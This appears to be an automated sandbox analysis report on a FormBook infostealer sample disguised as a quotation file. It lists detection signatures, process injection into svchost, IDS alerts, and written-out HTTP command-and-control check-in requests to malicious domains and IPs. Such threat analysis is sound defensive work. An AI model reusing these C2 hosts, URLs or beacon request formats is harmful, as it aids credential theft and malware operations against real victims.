Windows Analysis Report
QUOTATON-37839993.exe

Overview

General Information

Sample name: QUOTATON-37839993.exe
Analysis ID: 1569778
MD5: 4fff9ad3ccf6625dc0287e4ba41f0184
SHA1: a3b82d53b251831f76e70c02c7ecf7b33741650f
SHA256: f001831d4c2b9ff4970e74f952942525cd7a14578f64e39f7a360b94a9f84a73
Tags: exeuser-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QUOTATON-37839993.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\QUOTATON-37839993.exe" MD5: 4FFF9AD3CCF6625DC0287E4BA41F0184)
    • svchost.exe (PID: 7204 cmdline: "C:\Users\user\Desktop\QUOTATON-37839993.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FOBNeEFwBsF.exe (PID: 3204 cmdline: "C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • comp.exe (PID: 7940 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)
          • FOBNeEFwBsF.exe (PID: 5000 cmdline: "C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
Source | Rule | Description | Author | Strings
4.2.svchost.exe.2640000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
4.2.svchost.exe.2640000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ParentImage: C:\Users\user\Desktop\QUOTATON-37839993.exe, ParentProcessId: 6712, ParentProcessName: QUOTATON-37839993.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ProcessId: 7204, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ParentImage: C:\Users\user\Desktop\QUOTATON-37839993.exe, ParentProcessId: 6712, ParentProcessName: QUOTATON-37839993.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ProcessId: 7204, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T10:05:31.408001+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49857 | 38.47.233.21 | 80 | TCP
2024-12-06T10:05:56.367744+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49918 | 104.21.7.187 | 80 | TCP
2024-12-06T10:06:13.136575+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49962 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:27.894773+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49999 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:43.025524+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50026 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:58.786529+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50030 | 13.228.81.39 | 80 | TCP
2024-12-06T10:07:13.738566+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50035 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:29.655370+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50039 | 172.67.178.93 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T10:05:31.408001+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49857 | 38.47.233.21 | 80 | TCP
2024-12-06T10:05:56.367744+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49918 | 104.21.7.187 | 80 | TCP
2024-12-06T10:06:13.136575+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49962 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:27.894773+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:43.025524+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50026 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:58.786529+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50030 | 13.228.81.39 | 80 | TCP
2024-12-06T10:07:13.738566+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50035 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:29.655370+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50039 | 172.67.178.93 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T10:05:48.268092+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49899 | 104.21.7.187 | 80 | TCP
2024-12-06T10:05:50.924364+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49905 | 104.21.7.187 | 80 | TCP
2024-12-06T10:05:53.580707+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49912 | 104.21.7.187 | 80 | TCP
2024-12-06T10:06:05.092186+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49939 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:07.740586+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49947 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:10.393360+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49956 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:19.912720+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49977 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:22.579528+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49985 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:25.230863+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:35.015331+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50016 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:37.684527+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:40.442513+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50025 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:50.722386+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50027 | 13.228.81.39 | 80 | TCP
2024-12-06T10:06:53.394332+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50028 | 13.228.81.39 | 80 | TCP
2024-12-06T10:06:56.050566+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50029 | 13.228.81.39 | 80 | TCP
2024-12-06T10:07:05.771308+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50032 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:08.427626+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50033 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:11.088789+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50034 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:20.894779+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50036 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:23.551499+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50037 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:26.207724+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50038 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:36.229146+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50040 | 172.67.192.207 | 80 | TCP
2024-12-06T10:07:38.894686+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50041 | 172.67.192.207 | 80 | TCP


AV Detection

Source: https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB | Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/dc08/ | Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G | Avira URL Cloud: Label: malware
Source: QUOTATON-37839993.exe | ReversingLabs: Detection: 47%
Source: QUOTATON-37839993.exe | Virustotal: Detection: 30%
Source: Yara match | File source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: QUOTATON-37839993.exe | Joe Sandbox ML: detected
Source: QUOTATON-37839993.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: comp.pdb | source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: FOBNeEFwBsF.exe, 0000000C.00000000.2513093798.000000000023E000.00000002.00000001.01000000.00000005.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4007354281.000000000023E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: comp.pdbGCTL | source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6445A
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6C6D1 FindFirstFileW,FindClose,0_2_00E6C6D1
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C75C
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6EF95
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F0F2
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F3F3
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E637EF
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B12
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BCBC
Source: C:\Windows\SysWOW64\comp.exe | Code function: 13_2_02E7C420 FindFirstFileW,FindNextFileW,FindClose,13_2_02E7C420
Source: C:\Windows\SysWOW64\comp.exe | Code function: 4x nop then xor eax, eax | 13_2_02E69F20
Source: C:\Windows\SysWOW64\comp.exe | Code function: 4x nop then pop edi | 13_2_02E6E0FB
Source: C:\Windows\SysWOW64\comp.exe | Code function: 4x nop then mov ebx, 00000004h | 13_2_03490528

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49857 -> 38.47.233.21:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49857 -> 38.47.233.21:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49899 -> 104.21.7.187:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49905 -> 104.21.7.187:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49947 -> 206.238.89.119:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49962 -> 206.238.89.119:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49918 -> 104.21.7.187:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49962 -> 206.238.89.119:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49918 -> 104.21.7.187:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49912 -> 104.21.7.187:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 206.238.89.119:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49939 -> 206.238.89.119:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49977 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50026 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50030 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50030 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50035 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50035 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 172.67.178.93:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50039 -> 172.67.178.93:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50039 -> 172.67.178.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 172.67.192.207:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 172.67.192.207:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 172.67.178.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50038 -> 172.67.178.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 217.70.184.50:80
Source: Joe Sandbox View | IP Address: 199.59.243.227
Source: Joe Sandbox View | ASN Name: COGENT-174US
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E722EE
                Source: global trafficHTTP traffic detected: GET /t67p/?T2M=Y0Z0G&KxZ=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK+0pIYn6OsKXO6mwWbUGH3YR5hyu6M0h3PqYDwJCf+R1lkRh9UQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.qqa79.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic | HTTP traffic detected:
    GET /vjnn/?KxZ=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2C1TuTspqujhZjoi+NfkMLWXoMO10ul5nspQNZd1SB2qR4JUaa0=&T2M=Y0Z0G HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.gk88top.top
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)

Source: global traffic | HTTP traffic detected:
